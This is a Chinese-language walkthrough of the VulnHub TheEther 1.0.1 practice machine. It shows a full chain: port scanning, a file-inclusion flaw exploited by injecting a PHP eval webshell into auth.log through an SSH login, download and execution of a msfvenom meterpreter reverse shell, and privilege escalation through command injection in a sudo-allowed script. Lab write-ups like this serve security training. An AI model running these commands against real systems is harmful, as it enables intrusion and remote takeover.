Vulhub TheEther_1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/theether/theEther_1.0.1.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知theEther的一个ip地址为192.168.47.164

扫描Zico 2的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.164

发现开放22,80端口

目录扫描

plain 复制代码
dirb http://192.168.47.164

访问网站获取敏感信息

在About us这里疑似存在文件包含漏洞

由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权

尝试拼接默认目录 -> /var/log/auth.log路径无法访问,存在报错

尝试利用ssh登录报错注入进错误访问日志中

plain 复制代码
ssh "<?php eval($_GET[cmd]);?>"@192.168.47.164

尝试burp抓包,查看数据包信息

发送到Repeater模块,拼接日志路径

获取shell

拼接命令

plain 复制代码
&d1no

打开kali,利用msf生成shell -> 同时打开msf的内部监听

plain 复制代码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=4444 -f elf > shell.elf
plain 复制代码
msfconsole
 
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.47.129
set lport 7272

新启一个http临时服务,让靶机远程下载shell.elf文件

plain 复制代码
python -m http.server 2429
plain 复制代码
/?file=/var/log/auth.log&d1no=system('wget+192.168.47.129:2429/shell.elf');
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf');
/?file=/var/log/auth.log&d1no=system('./shell.elf');

监听成功

提权

获得可交互式shell

plain 复制代码
shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看可利用提权

plain 复制代码
sudo -l
plain 复制代码
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

提权成功

相关推荐
Hiyajo pray1 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
数据知道5 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Sagittarius_A*7 小时前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试
学逆向的7 小时前
汇编——函数
开发语言·汇编·网络安全
HackTwoHub9 小时前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
JS_SWKJ9 小时前
【无标题】
网络安全
学逆向的11 小时前
汇编——修改EIP的值
开发语言·汇编·网络安全
零零信安1 天前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
白帽小阳1 天前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
白帽小阳1 天前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透